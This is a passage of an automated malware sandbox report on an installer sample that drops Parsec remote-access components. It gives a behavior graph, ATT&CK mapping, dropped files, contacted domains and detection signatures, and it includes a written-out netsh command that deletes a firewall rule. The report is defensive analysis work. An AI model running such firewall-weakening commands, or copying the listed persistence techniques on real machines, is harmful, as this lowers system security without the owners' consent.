Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeCode function: EnumSystemLocalesW,51_2_00007FF7E5ADC528
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeCode function: GetLocaleInfoW,51_2_00007FF7E5ADC8D8
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeCode function: TranslateName,TranslateName,GetACP,IsValidCodePage,GetLocaleInfoW,51_2_00007FF7E5ADC1CC
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeCode function: GetLocaleInfoW,51_2_00007FF7E5ADCAE0
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,51_2_00007FF7E5ADCA30
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeCode function: EnumSystemLocalesW,GetUserDefaultLCID,ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,51_2_00007FF7E5ADCC14
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeCode function: GetLocaleInfoW,51_2_00007FF7E5AD4B3C
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,71_2_00007FF61819CA30
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: GetLocaleInfoW,71_2_00007FF61819CAE0
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: GetLocaleInfoW,71_2_00007FF618194B3C
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: EnumSystemLocalesW,GetUserDefaultLCID,ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,71_2_00007FF61819CC14
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: TranslateName,TranslateName,GetACP,IsValidCodePage,GetLocaleInfoW,71_2_00007FF61819C1CC
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: EnumSystemLocalesW,71_2_00007FF61819C528
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: EnumSystemLocalesW,71_2_00007FF61819C5F8
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,71_2_00007FF61819C690
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: EnumSystemLocalesW,71_2_00007FF6181946BC
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: GetLocaleInfoW,71_2_00007FF61819C8D8
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exeCode function: 48_2_00007FF72C2F4DD0 SetupDiGetClassDevsW,SetupDiEnumDeviceInfo,SetupDiGetDeviceRegistryPropertyW,GetLastError,GetLastError,LocalFree,LocalAlloc,SetupDiGetDeviceRegistryPropertyW,GetLastError,SetupDiGetDeviceRegistryPropertyW,GetLastError,GetLastError,LocalFree,LocalAlloc,SetupDiGetDeviceRegistryPropertyW,GetLastError,SetupDiGetDeviceRegistryPropertyW,GetLastError,GetLastError,LocalFree,LocalAlloc,SetupDiGetDeviceRegistryPropertyW,GetLastError,SetupDiBuildDriverInfoList,SetupDiEnumDriverInfoW,SetupDiEnumDeviceInfo,GetLastError,SetupDiDestroyDeviceInfoList,SetLastError,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,48_2_00007FF72C2F4DD0
Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\netsh.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\netsh.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\netsh.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\drvinst.exeQueries volume information: C:\Windows\System32\DriverStore\Temp\{18245a7a-9319-bd4f-bd5f-a24ba1e93bca}\parsecvusba.cat VolumeInformation
Source: C:\Windows\System32\drvinst.exeQueries volume information: C:\Windows\System32\DriverStore\Temp\{7106dfa1-62ec-4647-bfd5-42198dd8ac12}\parsecvirtualds.cat VolumeInformation
Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\runonce.exeKey value queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\TimeZoneInformation Bias
Source: C:\Program Files\Parsec\pservice.exeCode function: 39_2_00007FF7CD032130 SHGetKnownFolderPath,CoTaskMemFree,RegisterServiceCtrlHandlerExW,SetServiceStatus,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,GetLastError,SetServiceStatus,SetServiceStatus,ConnectNamedPipe,GetLastError,GetNamedPipeClientProcessId,ProcessIdToSessionId,WTSGetActiveConsoleSessionId,OpenProcess,QueryFullProcessImageNameW,CloseHandle,OpenProcess,OpenProcessToken,SHGetKnownFolderPath,CoTaskMemFree,CloseHandle,CloseHandle,ReadFile,WriteFile,DisconnectNamedPipe,EnterCriticalSection,GetExitCodeProcess,CloseHandle,LeaveCriticalSection,RegOpenKeyExW,RegQueryValueExW,RegCloseKey,SendSAS,RegCloseKey,OpenProcess,WriteFile,DisconnectNamedPipe,CloseHandle,CloseHandle,SetServiceStatus,39_2_00007FF7CD032130
Source: C:\Users\user\AppData\Roaming\PSecWin\7z.exeCode function: 6_2_00FB87AC free,free,free,free,free,free,free,_CxxThrowException,_CxxThrowException,free,free,free,free,free,free,free,free,free,free,memmove,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,GetSystemTimeAsFileTime,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,memmove,free,free,wcscmp,free,free,_CxxThrowException,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,memset,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,GetLastError,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,GetProcAddress,free,free,memset,memset,memset,free,free,free,free,free,free,free,free,GetProcAddress,GetLastError,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,memset,memset,memset,free,free,free,free,free,free,free,free,free,free,free,CompareFileTime,CompareFileTime,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,6_2_00FB87AC
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exeCode function: 48_2_00007FF72C3435E4 _get_daylight,_get_daylight,_get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation,48_2_00007FF72C3435E4
Source: C:\Users\user\AppData\Roaming\PSecWin\7z.exeCode function: 6_2_00FCDEA0 GetVersion,GetModuleHandleW,GetProcAddress,6_2_00FCDEA0
Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

barindex
Modifies the windows firewall
Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\System32\netsh.exe" advfirewall firewall delete rule name=Parsec
Uses netsh to modify the Windows network and firewall settings
Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\System32\netsh.exe" advfirewall firewall delete rule name=Parsec

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information12
Scripting		1
Valid Accounts		1
Windows Management Instrumentation		12
Scripting		1
LSASS Driver		21
Disable or Modify Tools		11
Input Capture		12
System Time Discovery		Remote Services1
Archive Collected Data		1
Ingress Tool Transfer		Exfiltration Over Other Network Medium1
System Shutdown/Reboot
CredentialsDomainsDefault Accounts1
Native API		1
LSASS Driver		1
DLL Side-Loading		1
Deobfuscate/Decode Files or Information		LSASS Memory3
File and Directory Discovery		Remote Desktop Protocol11
Input Capture		21
Encrypted Channel		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain Accounts12
Command and Scripting Interpreter		1
DLL Side-Loading		1
Valid Accounts		3
Obfuscated Files or Information		Security Account Manager47
System Information Discovery		SMB/Windows Admin Shares1
Clipboard Data		3
Non-Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal Accounts1
Scheduled Task/Job		1
Valid Accounts		11
Access Token Manipulation		1
Software Packing		NTDS2
Query Registry		Distributed Component Object ModelInput Capture14
Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud Accounts13
Service Execution		35
Windows Service		35
Windows Service		1
Timestomp		LSA Secrets21
Security Software Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled Task1
Scheduled Task/Job		12
Process Injection		1
DLL Side-Loading		Cached Domain Credentials1
Virtualization/Sandbox Evasion		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd Timers111
Registry Run Keys / Startup Folder		1
Scheduled Task/Job		1
File Deletion		DCSync2
Process Discovery		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/Job111
Registry Run Keys / Startup Folder		133
Masquerading		Proc Filesystem2
System Owner/User Discovery		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
Valid Accounts		/etc/passwd and /etc/shadow1
System Network Configuration Discovery		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
Virtualization/Sandbox Evasion		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd11
Access Token Manipulation		Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task12
Process Injection		KeyloggingProcess DiscoveryTaint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1555525 Sample: uu8v4UUzTU.exe Startdate: 14/11/2024 Architecture: WINDOWS Score: 42 184 beautifullyuncluttered.com 2->184 186 ifconfig.me 2->186 188 2 other IPs or domains 2->188 194 Suricata IDS alerts for network traffic 2->194 196 Sigma detected: Rare Remote Thread Creation By Uncommon Source Image 2->196 15 uu8v4UUzTU.exe 2 2->15         started        18 svchost.exe 2->18         started        20 pservice.exe 2->20         started        signatures3 process4 file5 182 C:\Users\user\AppData\...\uu8v4UUzTU.tmp, PE32 15->182 dropped 23 uu8v4UUzTU.tmp 23 64 15->23         started        27 drvinst.exe 18->27         started        30 drvinst.exe 18->30         started        32 drvinst.exe 18->32         started        34 2 other processes 18->34 200 Creates files in the system32 config directory 20->200 signatures6 process7 dnsIp8 190 beautifullyuncluttered.com 188.114.96.3, 443, 49708 CLOUDFLARENETUS European Union 23->190 192 ifconfig.me 34.160.111.145, 443, 49707 ATGS-MMD-ASUS United States 23->192 144 C:\Users\user\AppData\...\xwreg.dll (copy), PE32 23->144 dropped 146 C:\Users\user\...\xpsservices.dll (copy), PE32 23->146 dropped 148 C:\Users\user\AppData\...\wups.dll (copy), PE32 23->148 dropped 158 94 other files (none is malicious) 23->158 dropped 36 cmd.exe 1 23->36         started        38 cmd.exe 1 23->38         started        40 cmd.exe 1 23->40         started        42 cmd.exe 1 23->42         started        204 Tries to open files direct via NTFS file id 27->204 150 C:\Windows\...\parsecvusba.sys (copy), PE32+ 30->150 dropped 152 C:\Windows\System32\...\SET638E.tmp, PE32+ 30->152 dropped 154 C:\Windows\...\parsecvirtualds.sys (copy), PE32+ 32->154 dropped 156 C:\Windows\System32\...\SET70EC.tmp, PE32+ 32->156 dropped file9 signatures10 process11 process12 44 parsec-windows.exe 19 48 36->44         started        47 conhost.exe 36->47         started        49 7z.exe 3 38->49         started        51 conhost.exe 38->51         started        53 conhost.exe 40->53         started        55 conhost.exe 42->55         started        file13 172 C:\Program Files\Parsec\vusb\parsec-vud.exe, PE32 44->172 dropped 174 C:\Program Files\Parsec\pservice.exe, PE32+ 44->174 dropped 176 C:\Users\user\AppData\Local\...\nsExec.dll, PE32 44->176 dropped 180 8 other files (none is malicious) 44->180 dropped 57 cmd.exe 44->57         started        59 wscript.exe 1 44->59         started        62 cmd.exe 44->62         started        64 5 other processes 44->64 178 C:\Users\user\AppData\...\parsec-windows.exe, PE32 49->178 dropped process14 signatures15 66 parsec-vud.exe 57->66         started        70 conhost.exe 57->70         started        206 Uses schtasks.exe or at.exe to add and modify task schedules 59->206 208 Uses netsh to modify the Windows network and firewall settings 59->208 210 Windows Scripting host queries suspicious COM object (likely to drop second stage) 59->210 212 Modifies the windows firewall 59->212 72 taskkill.exe 1 59->72         started        74 sc.exe 1 59->74         started        76 parsec-vdd.exe 62->76         started        78 conhost.exe 62->78         started        80 sc.exe 1 64->80         started        82 sc.exe 64->82         started        84 7 other processes 64->84 process16 file17 128 C:\Program Files\...\parsecvusba.sys, PE32+ 66->128 dropped 130 C:\Program Files\...\parsecvirtualds.sys, PE32+ 66->130 dropped 132 C:\Program Files\...\nefconw.exe, PE32+ 66->132 dropped 140 5 other files (none is malicious) 66->140 dropped 198 Sample is not signed and drops a device driver 66->198 86 cmd.exe 66->86         started        88 cmd.exe 66->88         started        90 conhost.exe 72->90         started        92 conhost.exe 74->92         started        134 C:\Users\user\AppData\Local\...\nsExec.dll, PE32 76->134 dropped 136 C:\Users\user\AppData\Local\...\System.dll, PE32 76->136 dropped 138 C:\Program Files\...\uninstall.exe, PE32 76->138 dropped 142 2 other files (none is malicious) 76->142 dropped 94 cmd.exe 76->94         started        96 wevtutil.exe 76->96         started        98 conhost.exe 80->98         started        100 conhost.exe 82->100         started        102 7 other processes 84->102 signatures18 process19 process20 104 nefconw.exe 86->104         started        108 nefconw.exe 86->108         started        110 conhost.exe 86->110         started        112 nefconw.exe 86->112         started        114 conhost.exe 88->114         started        116 nefconc.exe 88->116         started        118 nefconw.exe 94->118         started        120 3 other processes 94->120 122 2 other processes 96->122 file21 160 C:\Users\user\...\parsecvirtualds.sys (copy), PE32+ 104->160 dropped 162 C:\Users\user\AppData\Local\...\SET7030.tmp, PE32+ 104->162 dropped 202 Creates an autostart registry key pointing to binary in C:\Windows 104->202 124 runonce.exe 104->124         started        164 C:\Users\user\...\parsecvusba.sys (copy), PE32+ 108->164 dropped 166 C:\Users\user\AppData\Local\...\SET614C.tmp, PE32+ 108->166 dropped 168 C:\Users\user\AppData\Local\...\mm.dll (copy), PE32+ 118->168 dropped 170 C:\Users\user\AppData\Local\...\SET8ABC.tmp, PE32+ 118->170 dropped signatures22 process23 process24 126 grpconv.exe 124->126         started       

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
uu8v4UUzTU.exe3%VirustotalBrowse

Dropped Files

SourceDetectionScannerLabelLink
C:\Program Files\Parsec Virtual Display Driver\driver\mm.dll0%ReversingLabs
C:\Program Files\Parsec Virtual Display Driver\nefconw.exe0%ReversingLabs
C:\Program Files\Parsec Virtual Display Driver\uninstall.exe0%ReversingLabs
C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exe0%ReversingLabs
C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe0%ReversingLabs
C:\Program Files\Parsec Virtual USB Adapter Driver\parsecvirtualds\parsecvirtualds.sys0%ReversingLabs
C:\Program Files\Parsec Virtual USB Adapter Driver\parsecvusba\parsecvusba.sys0%ReversingLabs
C:\Program Files\Parsec Virtual USB Adapter Driver\uninstall.exe0%ReversingLabs
C:\Program Files\Parsec\parsecd.exe0%ReversingLabs
C:\Program Files\Parsec\pservice.exe0%ReversingLabs
C:\Program Files\Parsec\skel\parsecd-150-93b.dll0%ReversingLabs
C:\Program Files\Parsec\teams.exe0%ReversingLabs
C:\Program Files\Parsec\uninstall.exe0%ReversingLabs
C:\Program Files\Parsec\vdd\parsec-vdd.exe0%ReversingLabs
C:\Program Files\Parsec\vusb\parsec-vud.exe0%ReversingLabs
C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmp0%ReversingLabs
C:\Users\user\AppData\Local\Temp\is-O9NMT.tmp\_isetup\_setup64.tmp0%ReversingLabs
C:\Users\user\AppData\Local\Temp\nsg84FF.tmp\System.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\nsg84FF.tmp\nsExec.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\nsj258A.tmp\ApplicationID.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\nsj258A.tmp\System.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\nsj258A.tmp\nsDialogs.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\nsj258A.tmp\nsExec.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\nsj59D8.tmp\System.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\nsj59D8.tmp\UserInfo.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\nsj59D8.tmp\nsExec.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\{0bfc15e2-0e86-4044-8941-72f0e156798b}\SET614C.tmp0%ReversingLabs
C:\Users\user\AppData\Local\Temp\{0bfc15e2-0e86-4044-8941-72f0e156798b}\parsecvusba.sys (copy)0%ReversingLabs
C:\Users\user\AppData\Local\Temp\{99c328e9-049a-fe42-a35c-67fa3e25e77d}\SET8ABC.tmp0%ReversingLabs
C:\Users\user\AppData\Local\Temp\{99c328e9-049a-fe42-a35c-67fa3e25e77d}\mm.dll (copy)0%ReversingLabs
C:\Users\user\AppData\Local\Temp\{a3ae9bde-474f-8049-a9b1-c003314cfbdb}\SET7030.tmp0%ReversingLabs
C:\Users\user\AppData\Local\Temp\{a3ae9bde-474f-8049-a9b1-c003314cfbdb}\parsecvirtualds.sys (copy)0%ReversingLabs
C:\Users\user\AppData\Roaming\PSecWin\7z.dll (copy)0%ReversingLabs
C:\Users\user\AppData\Roaming\PSecWin\7z.exe (copy)0%ReversingLabs
C:\Users\user\AppData\Roaming\PSecWin\IEAdvpack.dll (copy)0%ReversingLabs
C:\Users\user\AppData\Roaming\PSecWin\KBDA3.DLL (copy)0%ReversingLabs
C:\Users\user\AppData\Roaming\PSecWin\LockAppBroker.dll (copy)0%ReversingLabs
C:\Users\user\AppData\Roaming\PSecWin\MCRecvSrc.dll (copy)0%ReversingLabs
C:\Users\user\AppData\Roaming\PSecWin\MFWMAAEC.DLL (copy)0%ReversingLabs
C:\Users\user\AppData\Roaming\PSecWin\MP43DECD.DLL (copy)0%ReversingLabs
C:\Users\user\AppData\Roaming\PSecWin\RdpSaUacHelper.exe (copy)0%ReversingLabs
C:\Users\user\AppData\Roaming\PSecWin\SyncInfrastructureps.dll (copy)0%ReversingLabs
C:\Users\user\AppData\Roaming\PSecWin\SystemEventsBrokerClient.dll (copy)0%ReversingLabs
C:\Users\user\AppData\Roaming\PSecWin\TpmTool.exe (copy)0%ReversingLabs
C:\Users\user\AppData\Roaming\PSecWin\TrustedSignalCredProv.dll (copy)0%ReversingLabs
C:\Users\user\AppData\Roaming\PSecWin\UserDataAccessRes.dll (copy)0%ReversingLabs
C:\Users\user\AppData\Roaming\PSecWin\VAN.dll (copy)0%ReversingLabs
C:\Users\user\AppData\Roaming\PSecWin\VscMgrPS.dll (copy)0%ReversingLabs
C:\Users\user\AppData\Roaming\PSecWin\WSClient.dll (copy)0%ReversingLabs
C:\Users\user\AppData\Roaming\PSecWin\Windows.ApplicationModel.ConversationalAgent.dll (copy)0%ReversingLabs
C:\Users\user\AppData\Roaming\PSecWin\Windows.UI.dll (copy)0%ReversingLabs
C:\Users\user\AppData\Roaming\PSecWin\cryptdlg.dll (copy)0%ReversingLabs
C:\Users\user\AppData\Roaming\PSecWin\dmcfgutils.dll (copy)0%ReversingLabs
C:\Users\user\AppData\Roaming\PSecWin\dskquoui.dll (copy)0%ReversingLabs
C:\Users\user\AppData\Roaming\PSecWin\getuname.dll (copy)0%ReversingLabs
C:\Users\user\AppData\Roaming\PSecWin\gp548-win64-mingw.exe (copy)0%ReversingLabs
C:\Users\user\AppData\Roaming\PSecWin\icuin.dll (copy)0%ReversingLabs
C:\Users\user\AppData\Roaming\PSecWin\iesysprep.dll (copy)0%ReversingLabs
C:\Users\user\AppData\Roaming\PSecWin\is-0HD4S.tmp0%ReversingLabs
C:\Users\user\AppData\Roaming\PSecWin\is-2DG57.tmp0%ReversingLabs
C:\Users\user\AppData\Roaming\PSecWin\is-2OR81.tmp0%ReversingLabs
C:\Users\user\AppData\Roaming\PSecWin\is-2UJJU.tmp0%ReversingLabs
C:\Users\user\AppData\Roaming\PSecWin\is-3JPOJ.tmp0%ReversingLabs
C:\Users\user\AppData\Roaming\PSecWin\is-3KUTO.tmp0%ReversingLabs
C:\Users\user\AppData\Roaming\PSecWin\is-4URGO.tmp0%ReversingLabs
C:\Users\user\AppData\Roaming\PSecWin\is-514OT.tmp0%ReversingLabs
C:\Users\user\AppData\Roaming\PSecWin\is-66C2H.tmp0%ReversingLabs
C:\Users\user\AppData\Roaming\PSecWin\is-6QS3I.tmp0%ReversingLabs
C:\Users\user\AppData\Roaming\PSecWin\is-9HF18.tmp0%ReversingLabs
C:\Users\user\AppData\Roaming\PSecWin\is-9PV08.tmp0%ReversingLabs
C:\Users\user\AppData\Roaming\PSecWin\is-ADU4M.tmp0%ReversingLabs
C:\Users\user\AppData\Roaming\PSecWin\is-B9257.tmp0%ReversingLabs
C:\Users\user\AppData\Roaming\PSecWin\is-BT11A.tmp0%ReversingLabs
C:\Users\user\AppData\Roaming\PSecWin\is-CEP95.tmp0%ReversingLabs
C:\Users\user\AppData\Roaming\PSecWin\is-CFLCO.tmp0%ReversingLabs
C:\Users\user\AppData\Roaming\PSecWin\is-CR69T.tmp0%ReversingLabs
C:\Users\user\AppData\Roaming\PSecWin\is-DPGTR.tmp0%ReversingLabs
C:\Users\user\AppData\Roaming\PSecWin\is-E0QD0.tmp0%ReversingLabs
C:\Users\user\AppData\Roaming\PSecWin\is-E9NUA.tmp0%ReversingLabs
C:\Users\user\AppData\Roaming\PSecWin\is-ETRQM.tmp0%ReversingLabs
C:\Users\user\AppData\Roaming\PSecWin\is-G3B26.tmp0%ReversingLabs
C:\Users\user\AppData\Roaming\PSecWin\is-GF1GP.tmp0%ReversingLabs
C:\Users\user\AppData\Roaming\PSecWin\is-GTN75.tmp0%ReversingLabs
C:\Users\user\AppData\Roaming\PSecWin\is-HI204.tmp0%ReversingLabs
C:\Users\user\AppData\Roaming\PSecWin\is-I559Q.tmp0%ReversingLabs
C:\Users\user\AppData\Roaming\PSecWin\is-IH0UT.tmp0%ReversingLabs
C:\Users\user\AppData\Roaming\PSecWin\is-IQ3DU.tmp0%ReversingLabs
C:\Users\user\AppData\Roaming\PSecWin\is-JBM9N.tmp0%ReversingLabs
C:\Users\user\AppData\Roaming\PSecWin\is-JR54E.tmp0%ReversingLabs
C:\Users\user\AppData\Roaming\PSecWin\is-KU451.tmp0%ReversingLabs
C:\Users\user\AppData\Roaming\PSecWin\is-KU5LP.tmp0%ReversingLabs
C:\Users\user\AppData\Roaming\PSecWin\is-LQSSJ.tmp0%ReversingLabs

Unpacked PE Files

No Antivirus matches

Domains

SourceDetectionScannerLabelLink
beautifullyuncluttered.com0%VirustotalBrowse

URLs

SourceDetectionScannerLabelLink
https://parsec.appURLUpdateInfohttps://parsec.app/changelogURL:parsec0%Avira URL Cloudsafe
https://parsec.appURLUpdateInfohttps://parsec.app/changelog0%Avira URL Cloudsafe
https://parsec.appURLUpdateInfohttps://parsec.app/changelogkernel32::Wow64EnableWow64FsRedirection(i0%Avira URL Cloudsafe
https://beautifullyuncluttered.com/0%Avira URL Cloudsafe
https://support.parsec.appInstallLocationNoModifyNoRepairPublisherParsec0%Avira URL Cloudsafe
https://beautifullyuncluttered.com/?CheckApp0%Avira URL Cloudsafe
https://beautifullyuncluttered.com/0%VirustotalBrowse

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
beautifullyuncluttered.com
188.114.96.3
truetrueunknown
ifconfig.me
34.160.111.145
truefalse
    		high
    fp2e7a.wpc.phicdn.net
    		192.229.221.95
    		truefalse
      		high

      Contacted URLs

      NameMaliciousAntivirus DetectionReputation
      https://ifconfig.me/ipfalse
        		high
        https://beautifullyuncluttered.com/?CheckApptrue
        • Avira URL Cloud: safe
        		unknown

        URLs from Memory and Binaries

        NameSourceMaliciousAntivirus DetectionReputation
        https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupUuu8v4UUzTU.exe, is-LQSSJ.tmp.2.drfalse
          		high
          https://parsec.appURLUpdateInfohttps://parsec.app/changelogURL:parsecparsec-windows.exe, 0000000D.00000003.2494039079.0000000000675000.00000004.00000020.00020000.00000000.sdmp, parsec-windows.exe, 0000000D.00000002.2494938332.0000000000675000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://www.remobjects.com/psuu8v4UUzTU.exe, 00000000.00000003.2029697537.000000007FB30000.00000004.00001000.00020000.00000000.sdmp, uu8v4UUzTU.exe, 00000000.00000003.2029324917.0000000002510000.00000004.00001000.00020000.00000000.sdmp, uu8v4UUzTU.tmp, 00000002.00000000.2031188431.0000000000401000.00000020.00000001.01000000.00000004.sdmpfalse
            		high
            https://ifconfig.me/uu8v4UUzTU.tmp, 00000002.00000002.2293720265.0000000003710000.00000004.00000020.00020000.00000000.sdmpfalse
              		high
              https://ifconfig.me/ip5.1ryuu8v4UUzTU.tmp, 00000002.00000003.2288804175.0000000000A95000.00000004.00000020.00020000.00000000.sdmp, uu8v4UUzTU.tmp, 00000002.00000002.2292586991.0000000000A9D000.00000004.00000020.00020000.00000000.sdmpfalse
                		high
                http://www.unicode.org/copyright.htmluu8v4UUzTU.tmp, 00000002.00000003.2276467221.00000000059D3000.00000004.00001000.00020000.00000000.sdmpfalse
                  		high
                  https://www.innosetup.com/uu8v4UUzTU.exe, 00000000.00000003.2029697537.000000007FB30000.00000004.00001000.00020000.00000000.sdmp, uu8v4UUzTU.exe, 00000000.00000003.2029324917.0000000002510000.00000004.00001000.00020000.00000000.sdmp, uu8v4UUzTU.tmp, 00000002.00000000.2031188431.0000000000401000.00000020.00000001.01000000.00000004.sdmpfalse
                    		high
                    https://parsec.appURLUpdateInfohttps://parsec.app/changelogparsec-vdd.exe, 00000041.00000002.2492098487.00000000005D1000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://nsis.sf.net/NSIS_ErrorErrorparsec-windows.exe, 0000000D.00000000.2203144262.000000000040A000.00000008.00000001.01000000.0000000A.sdmp, parsec-windows.exe, 0000000D.00000002.2494270258.000000000040A000.00000004.00000001.01000000.0000000A.sdmp, parsec-vud.exe, 0000002D.00000002.2448675906.000000000040A000.00000004.00000001.01000000.00000011.sdmp, parsec-vud.exe, 0000002D.00000000.2346150656.000000000040A000.00000008.00000001.01000000.00000011.sdmp, parsec-vdd.exe, 00000041.00000000.2456937852.000000000040A000.00000008.00000001.01000000.00000017.sdmp, parsec-vdd.exe, 00000041.00000002.2491857385.000000000040A000.00000004.00000001.01000000.00000017.sdmpfalse
                      		high
